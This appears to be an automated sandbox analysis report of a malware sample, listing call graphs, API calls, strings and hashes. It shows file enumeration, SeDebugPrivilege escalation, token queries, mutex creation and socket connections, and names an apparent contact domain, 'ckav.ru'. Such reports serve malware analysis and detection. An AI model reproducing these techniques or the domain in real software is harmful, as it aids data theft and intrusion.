9299->9287 9300 4139de 9309 413855 9300->9309 9302 4139f1 9303 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9302->9303 9307 4139f7 9303->9307 9304 413866 58 API calls 9305 413a2d 9304->9305 9306 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9305->9306 9308 413a34 9306->9308 9307->9304 9310 4031e5 4 API calls 9309->9310 9311 413864 9310->9311 9311->9311 9936 4116e7 9937 4117ba 9936->9937 9938 405b6f 6 API calls 9937->9938 9943 4117f1 9937->9943 9939 4117d0 9938->9939 9940 404cbf 8 API calls 9939->9940 9939->9943 9941 4117eb 9940->9941 9942 402bab 2 API calls 9941->9942 9942->9943 9331 4094e7 9332 404b22 6 API calls 9331->9332 9333 4094fe 9332->9333 9334 409554 9333->9334 9335 405b6f 6 API calls 9333->9335 9336 409514 9335->9336 9337 404b22 6 API calls 9336->9337 9344 40954d 9336->9344 9339 40952d 9337->9339 9338 402bab 2 API calls 9338->9334 9340 409544 9339->9340 9341 409408 15 API calls 9339->9341 9342 402bab 2 API calls 9340->9342 9343 40953e 9341->9343 9342->9344 9345 402bab 2 API calls 9343->9345 9344->9338 9345->9340 9354 4058ea 9355 4031e5 4 API calls 9354->9355 9356 4058fd StrStrA 9355->9356 9988 40d4ea 9989 404bee 6 API calls 9988->9989 9991 40d500 9989->9991 9990 40d5a0 9991->9990 9992 404bee 6 API calls 9991->9992 9993 40d529 9992->9993 9994 404bee 6 API calls 9993->9994 9995 40d537 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d546 9996->9997 9997->9990 9998 405872 4 API calls 9997->9998 9999 40d56d 9998->9999 10000 405872 4 API calls 9999->10000 10001 40d57c 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d58e 10002->10003 10004 405872 4 API calls 10003->10004 10004->9990 10005 40a3ea 10006 40374e 6 API calls 10005->10006 10007 40a403 10006->10007 10008 40a419 10007->10008 10009 4059d8 4 API calls 10007->10009 10010 40a411 10009->10010 10011 402bab 2 API calls 10010->10011 10011->10008 9394 404df3 WSAStartup 9398 4091f6 9399 404b22 6 API calls 9398->9399 9400 40920b 9399->9400 9401 409222 9400->9401 9402 409408 15 API calls 9400->9402 9403 40921c 9402->9403 9404 402bab 2 API calls 9403->9404 9404->9401 10038 4117fe 10039 404c4e 6 API calls 10038->10039 10040 411888 10039->10040 10041 404c4e 6 API calls 10040->10041 10046 411925 10040->10046 10042 4118ab 10041->10042 10042->10046 10057 4119b3 10042->10057 10044 4118c5 10045 4119b3 4 API calls 10044->10045 10047 4118d0 10045->10047 10047->10046 10048 4056bf 2 API calls 10047->10048 10049 4118fd 10048->10049 10050 405872 4 API calls 10049->10050 10051 41190a 10050->10051 10052 405872 4 API calls 10051->10052 10053 411915 10052->10053 10054 413aca 4 API calls 10053->10054 10055 41191f 10054->10055 10056 405695 2 API calls 10055->10056 10056->10046 10058 4119c6 10057->10058 10060 4119bf 10057->10060 10059 4031e5 4 API calls 10058->10059 10059->10060 10060->10044 9408 40e880 9409 41219c 14 API calls 9408->9409 9410 40e88e 9409->9410 9411 41219c 14 API calls 9410->9411 9412 40e89c 9411->9412 10124 40e48a 10125 404bee 6 API calls 10124->10125 10126 40e4d0 10125->10126 10127 405872 4 API calls 10126->10127 10128 40e4f4 10126->10128 10127->10128 9509 410390 9510 404b22 6 API calls 9509->9510 9511 4103a5 9510->9511 9512 410409 9511->9512 9513 405b6f 6 API calls 9511->9513 9518 4103ba 9513->9518 9514 410402 9515 402bab 2 API calls 9514->9515 9515->9512 9516 4103fb 9517 402bab 2 API calls 9516->9517 9517->9514 9518->9514 9518->9516 9519 403d74 19 API calls 9518->9519 9520 4103ee 9519->9520 9520->9516 9521 402bab 2 API calls 9520->9521 9521->9516 10139 40ed96 10140 4040bb 12 API calls 10139->10140 10154 40edb0 10140->10154 10141 40ef90 10142 40ef87 10143 403f9e 5 API calls 10142->10143 10143->10141 10144 405ae9 6 API calls 10144->10154 10145 412269 6 API calls 10145->10154 10146 40ef61 10147 40ef6e 10146->10147 10149 402bab 2 API calls 10146->10149 10148 40ef7c 10147->10148 10150 402bab 2 API calls 10147->10150 10148->10142 10151 402bab 2 API calls 10148->10151 10149->10147 10150->10148 10151->10142 10152 402bab GetProcessHeap HeapFree 10152->10154 10153 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10153->10154 10154->10141 10154->10142 10154->10144 10154->10145 10154->10146 10154->10152 10154->10153 10155 40ef98 10156 404c4e 6 API calls 10155->10156 10157 40efb6 10156->10157 10158 40f02a 10157->10158 10170 40f054 10157->10170 10161 404bee 6 API calls 10162 40efda 10161->10162 10163 404bee 6 API calls 10162->10163 10164 40efe9 10163->10164 10164->10158 10165 405872 4 API calls 10164->10165 10166 40f008 10165->10166 10167 405872 4 API calls 10166->10167 10168 40f01a 10167->10168 10169 405872 4 API calls 10168->10169 10169->10158 10171 40f064 10170->10171 10172 402b7c 2 API calls 10171->10172 10174 40f072 10172->10174 10173 40efca 10173->10161 10174->10173 10176 405ecd 10174->10176 10177 4059b8 4 API calls 10176->10177 10178 405edf 10177->10178 10178->10174 9528 410c98 9529 41219c 14 API calls 9528->9529 9530 410ca8 9529->9530 9531 41219c 14 API calls 9530->9531 9532 410cb5 9531->9532 9533 412093 20 API calls 9532->9533 9534 410cc9 9533->9534 10248 41249c 10249 4056bf 2 API calls 10248->10249 10250 4124aa 10249->10250 10251 4057df 13 API calls 10250->10251 10256 4124ce 10250->10256 10252 4124be 10251->10252 10253 413aca 4 API calls 10252->10253 10254 4124c8 10253->10254 10255 405695 2 API calls 10254->10255 10255->10256 9538 40f49e 9539 40f4b6 13 API calls 9538->9539 9540 40f4a8 9539->9540 9541 40929e 9542 413b28 6 API calls 9541->9542 9543 4092a4 9542->9543 9544 405b6f 6 API calls 9543->9544 9545 4092af 9544->9545 9546 4092c5 9545->9546 9547 409408 15 API calls 9545->9547 9548 4092bf 9547->9548 9549 402bab 2 API calls 9548->9549 9549->9546 10275 407fa4 10276 407fb7 10275->10276 10277 402b7c 2 API calls 10276->10277 10279 407fee 10276->10279 10278 40800d 10277->10278 10278->10279 10280 4037be 4 API calls 10278->10280 10281 40803c 10280->10281 10282 402bab 2 API calls 10281->10282 10282->10279 9586 4090aa 9587 404b22 6 API calls 9586->9587 9588 4090c1 9587->9588 9589 409408 15 API calls 9588->9589 9595 4090d8 9588->9595 9591 4090d2 9589->9591 9590 404b22 6 API calls 9592 4090eb 9590->9592 9593 402bab 2 API calls 9591->9593 9594 408c4d 15 API calls 9592->9594 9598 409104 9592->9598 9593->9595 9596 4090fe 9594->9596 9595->9590 9597 402bab 2 API calls 9596->9597 9597->9598 9605 409cae 9620 404b79 9605->9620 9607 409cc5 9608 409d27 9607->9608 9610 405b6f 6 API calls 9607->9610 9611 409d2f 9607->9611 9609 402bab 2 API calls 9608->9609 9609->9611 9612 409cec 9610->9612 9612->9608 9613 404b79 6 API calls 9612->9613 9614 409d05 9613->9614 9615 409d1e 9614->9615 9616 408c4d 15 API calls 9614->9616 9617 402bab 2 API calls 9615->9617 9618 409d18 9616->9618 9617->9608 9619 402bab 2 API calls 9618->9619 9619->9615 9621 404b22 6 API calls 9620->9621 9622 404b8a 9621->9622 9622->9607 10342 411fb3 10343 405b6f 6 API calls 10342->10343 10345 412013 10343->10345 10344 412075 10345->10344 10346 41206a 10345->10346 10361 411a8d 10345->10361 10348 402bab 2 API calls 10346->10348 10348->10344 10350 4056bf 2 API calls 10351 41203d 10350->10351 10352 405872 4 API calls 10351->10352 10353 41204a 10352->10353 10354 413aca 4 API calls 10353->10354 10355 412054 10354->10355 10356 405695 2 API calls 10355->10356 10357 41205a 10356->10357 10358 413a58 13 API calls 10357->10358 10359 412064 10358->10359 10360 402bab 2 API calls 10359->10360 10360->10346 10362 402b7c 2 API calls 10361->10362 10364 411aa3 10362->10364 10363 411f05 10363->10346 10363->10350 10364->10363 10384 404ada 10364->10384 10367 404ada 4 API calls 10368 411cad 10367->10368 10369 411f0c 10368->10369 10370 411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10379 411d7b 10374->10379 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10380 411ed6 10378->10380 10379->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10379->10382 10383 405eb6 4 API calls 10379->10383 10381 405eb6 4 API calls 10380->10381 10381->10363 10382->10379 10383->10379 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9706 404d04 9698->9706 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9706 9704 404b8f 5 API calls 9704->9706 9705 404a39 5 API calls 9705->9706 9706->9699 9706->9701 9706->9703 9706->9704 9706->9705 9707 405b6f 6 API calls 9706->9707 9708 404cbf 8 API calls 9706->9708 9709 402bab GetProcessHeap HeapFree 9706->9709 9707->9706 9708->9706 9709->9706 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9714 404cbf 8 API calls 9712->9714 9722 40f115 9712->9722 9713 41219c 14 API calls 9715 40f128 9713->9715 9716 40f0ed 9714->9716 9717 404cbf 8 API calls 9716->9717 9718 40f0fb 9717->9718 9719 413aca 4 API calls 9718->9719 9720 40f10a 9719->9720 9721 405695 2 API calls 9720->9721 9721->9722 9722->9713

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 156 403f97-403f9d 152->156 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 164 403e75-403e90 call 4031e5 FindNextFileW 159->164 165 403dde-403de2 159->165 160->150 176 403f03-403f0a 161->176 177 403efa-403f01 161->177 162->152 164->159 180 403e96-403e97 call 403bef 164->180 169 403e12-403e22 call 405d24 165->169 170 403de4-403df9 call 405eff 165->170 186 403e30-403e4c call 405b6f 169->186 187 403e24-403e2e 169->187 170->164 189 403dfb-403e10 call 405eff 170->189 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 195 403e9c 180->195 198 403f87-403f88 call 403bef 181->198 199 403f5e-403f61 181->199 182->181 196 403f2f-403f33 182->196 183->181 183->182 186->164 203 403e4e-403e6f call 403d74 call 402bab 186->203 187->164 187->186 189->164 189->169 195->160 201 403f75-403f85 call 402bab call 403bef 196->201 202 403f35-403f36 call 40fa23 196->202 207 403f8d 198->207 199->161 201->156 209 403f39-403f40 call 402bab 202->209 203->164 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->181 217->156
                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->554 553 404ecd-404ece 548->553 553->539 554->553
                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess_wmemset
                    • String ID: CA
                    • API String ID: 2773065342-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
